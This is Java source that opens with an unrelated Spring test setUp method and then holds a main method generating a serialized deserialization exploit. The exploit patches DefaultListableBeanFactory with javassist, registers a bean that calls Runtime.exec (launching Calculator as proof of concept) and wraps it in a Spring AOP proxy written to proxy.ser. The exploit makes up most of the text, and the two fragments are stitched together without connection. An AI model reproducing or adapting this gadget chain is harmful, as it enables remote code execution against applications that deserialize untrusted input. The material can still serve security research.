@Before
 public void setUp() {
   converter = new Jaxb2RootElementHttpMessageConverter();
   rootElement = new RootElement();
   DefaultAopProxyFactory proxyFactory = new DefaultAopProxyFactory();
   AdvisedSupport advisedSupport = new AdvisedSupport();
   advisedSupport.setTarget(rootElement);
   advisedSupport.setProxyTargetClass(true);
   AopProxy proxy = proxyFactory.createAopProxy(advisedSupport);
   rootElementCglib = (RootElement) proxy.getProxy();
 }
  public static void main(String[] arguments) {

    // Get a DefaultListableBeanFactory modified so it has no writeReplace() method
    // We cannot load DefaultListableFactory till we are done modyfing it otherwise will get a
    // "attempted duplicate class definition for name" exception
    System.out.println(
        "[+] Getting a DefaultListableBeanFactory modified so it has no writeReplace() method");
    Object instrumentedFactory = null;
    ClassPool pool = ClassPool.getDefault();
    try {
      pool.appendClassPath(new javassist.LoaderClassPath(BeanDefinition.class.getClassLoader()));
      CtClass instrumentedClass =
          pool.get("org.springframework.beans.factory.support.DefaultListableBeanFactory");
      // Call setSerialVersionUID before modifying a class to maintain serialization compatability.
      SerialVersionUID.setSerialVersionUID(instrumentedClass);
      CtMethod method = instrumentedClass.getDeclaredMethod("writeReplace");
      // method.insertBefore("{ System.out.println(\"TESTING\"); }");
      method.setName("writeReplaceDisabled");
      Class instrumentedFactoryClass = instrumentedClass.toClass();
      instrumentedFactory = instrumentedFactoryClass.newInstance();
    } catch (Exception e) {
      e.printStackTrace();
    }
    // Modified BeanFactory
    DefaultListableBeanFactory beanFactory = (DefaultListableBeanFactory) instrumentedFactory;

    // Create malicious bean definition programatically
    System.out.println("[+] Creating malicious bean definition programatically");

    // First we will set up a bean created with a factory method (instead of using the constructor)
    // that will return a java.lang.Runtime
    // Runtime or ProcessBuilder are not serializable so we cannot use them for the
    // MethodInvokingFactory targetObject, but we can use a bean definition instead that wraps
    // these objects as the server will instantiate them
    GenericBeanDefinition runtime = new GenericBeanDefinition();
    runtime.setBeanClass(Runtime.class);
    runtime.setFactoryMethodName("getRuntime"); // Factory Method needs to be static

    // Exploit bean to be registered in the bean factory as the target source
    GenericBeanDefinition payload = new GenericBeanDefinition();
    // use MethodInvokingFactoryBean instead of factorymethod because we need to pass arguments,
    // and can't do that with the unserializable ConstructorArgumentValues
    payload.setBeanClass(MethodInvokingFactoryBean.class);
    payload.setScope("prototype");
    payload.getPropertyValues().add("targetObject", runtime);
    payload.getPropertyValues().add("targetMethod", "exec");
    payload
        .getPropertyValues()
        .add(
            "arguments",
            Collections.singletonList("/Applications/Calculator.app/Contents/MacOS/Calculator"));

    beanFactory.registerBeanDefinition("exploit", payload);

    // Preparing BeanFactory to be serialized
    System.out.println("[+] Preparing BeanFactory to be serialized");
    System.out.println("[+] Nullifying non-serializable members");
    try {

      Field constructorArgumentValues =
          AbstractBeanDefinition.class.getDeclaredField("constructorArgumentValues");
      constructorArgumentValues.setAccessible(true);
      constructorArgumentValues.set(payload, null);
      System.out.println(
          "[+] payload BeanDefinition constructorArgumentValues property should be null: "
              + payload.getConstructorArgumentValues());

      Field methodOverrides = AbstractBeanDefinition.class.getDeclaredField("methodOverrides");
      methodOverrides.setAccessible(true);
      methodOverrides.set(payload, null);
      System.out.println(
          "[+] payload BeanDefinition methodOverrides property should be null: "
              + payload.getMethodOverrides());

      Field constructorArgumentValues2 =
          AbstractBeanDefinition.class.getDeclaredField("constructorArgumentValues");
      constructorArgumentValues2.setAccessible(true);
      constructorArgumentValues2.set(runtime, null);
      System.out.println(
          "[+] runtime BeanDefinition constructorArgumentValues property should be null: "
              + runtime.getConstructorArgumentValues());

      Field methodOverrides2 = AbstractBeanDefinition.class.getDeclaredField("methodOverrides");
      methodOverrides2.setAccessible(true);
      methodOverrides2.set(runtime, null);
      System.out.println(
          "[+] runtime BeanDefinition methodOverrides property should be null: "
              + runtime.getMethodOverrides());

      Field autowireCandidateResolver =
          DefaultListableBeanFactory.class.getDeclaredField("autowireCandidateResolver");
      autowireCandidateResolver.setAccessible(true);
      autowireCandidateResolver.set(beanFactory, null);
      System.out.println(
          "[+] BeanFactory autowireCandidateResolver property should be null: "
              + beanFactory.getAutowireCandidateResolver());

    } catch (Exception i) {
      i.printStackTrace();
      System.exit(-1);
    }

    // AbstractBeanFactoryBasedTargetSource
    System.out.println(
        "[+] Creating a TargetSource for our handler, all hooked calls will be delivered to our malicious bean provided by our factory");
    SimpleBeanTargetSource targetSource = new SimpleBeanTargetSource();
    targetSource.setTargetBeanName("exploit");
    targetSource.setBeanFactory(beanFactory);

    // JdkDynamicAopProxy (invocationhandler)
    System.out.println(
        "[+] Creating the handler and configuring the target source pointing to our malicious bean factory");
    AdvisedSupport config = new AdvisedSupport();
    config.addInterface(Contact.class); // So that the factory returns a JDK dynamic proxy
    config.setTargetSource(targetSource);
    DefaultAopProxyFactory handlerFactory = new DefaultAopProxyFactory();
    InvocationHandler handler = (InvocationHandler) handlerFactory.createAopProxy(config);

    // Proxy
    System.out.println(
        "[+] Creating a Proxy implementing the server side expected interface (Contact) with our malicious handler");
    Contact proxy =
        (Contact)
            Proxy.newProxyInstance(
                Contact.class.getClassLoader(), new Class<?>[] {Contact.class}, handler);

    // System.out.println("[+] Trying exploit locally " + proxy.getName());

    // Now lets serialize the proxy
    System.out.println("[+] Serializating malicious proxy");
    try {
      FileOutputStream fileOut = new FileOutputStream("proxy.ser");
      ObjectOutputStream outStream = new ObjectOutputStream(fileOut);
      outStream.writeObject(proxy);
      outStream.close();
      fileOut.close();
    } catch (IOException i) {
      i.printStackTrace();
    }
    System.out.println("[+] Successfully serialized: " + proxy.getClass().getName());
  }